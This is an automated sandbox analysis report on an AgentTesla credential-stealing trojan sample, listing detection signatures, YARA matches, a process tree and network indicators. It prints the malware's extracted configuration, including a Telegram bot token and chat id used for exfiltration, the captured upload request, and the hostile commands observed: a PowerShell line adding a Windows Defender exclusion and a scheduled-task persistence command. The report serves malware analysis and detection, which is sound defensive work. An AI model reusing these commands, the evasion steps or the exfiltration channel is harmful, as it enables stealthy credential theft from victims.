Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.29978

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.29978 (renamed file extension from 29978 to exe)
Analysis ID:620054
MD5:b78eed700665bf868771e371d2622000
SHA1:48daa093155e9eaa563f6eb537a57f940f2aa6c6
SHA256:9eeac4773d7f0e7f4303baed25c04f0b138e55f9fa7e7c718e3e6599a2e41513
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe" MD5: B78EED700665BF868771E371D2622000)
    • powershell.exe (PID: 4184 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 4024 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gfLnSNNH" /XML "C:\Users\user\AppData\Local\Temp\tmp20B8.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "5049233732", "Chat URL": "https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocument"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          0000000B.00000000.380767912.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries
            SourceRuleDescriptionAuthorStrings
            11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32b18:$s10: logins
                • 0x32585:$s11: credential
                • 0x2eb16:$g1: get_Clipboard
                • 0x2eb24:$g2: get_Keyboard
                • 0x2eb31:$g3: get_Password
                • 0x2fde8:$g4: get_CtrlKeyDown
                • 0x2fdf8:$g5: get_ShiftKeyDown
                • 0x2fe09:$g6: get_AltKeyDown
                11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 33 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5049233732", "Chat URL": "https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocument"}
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.6704.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendMessage"}
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeVirustotal: Detection: 36%Perma Link
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeReversingLabs: Detection: 33%
                    Source: C:\Users\user\AppData\Roaming\gfLnSNNH.exeReversingLabs: Detection: 33%
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\gfLnSNNH.exeJoe Sandbox ML: detected
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da2dbb979928b4Host: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591945120.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.593876790.0000000006DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gWlKgh.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388377092.00000000068E2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.328125590.00000000009DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.328125590.00000000009DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnbJf
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.328125590.00000000009DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591896163.00000000031EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1Z2zbEimUPt561zauMh.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1Z2zbEimUPt561zauMh.comp
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000000.379081900.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocument
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocumentdocument-----
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591914892.00000000031F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4mi
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.591209742.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot5187728823:AAGLMGn_JlHiLgjLPDeSA29u69fic0Upi8Y/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da2dbb979928b4Host: api.telegram.orgContent-Length: 999Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49751 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383150160.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3920360.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3920360.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.28929b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b75BEAC34u002d3A93u002d4A67u002dBD8Eu002dD6BBBC02D916u007d/u0034754F24Au002d697Bu002d4421u002dB99Fu002d50E1D8F63995.csLarge array initialization: .cctor: array initializer size 11668
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b75BEAC34u002d3A93u002d4A67u002dBD8Eu002dD6BBBC02D916u007d/u0034754F24Au002d697Bu002d4421u002dB99Fu002d50E1D8F63995.csLarge array initialization: .cctor: array initializer size 11668
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3920360.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3920360.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.398a9a0.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.28929b0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.3956580.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 0_2_026638A4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 0_2_0266CA5C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 0_2_02666AC2
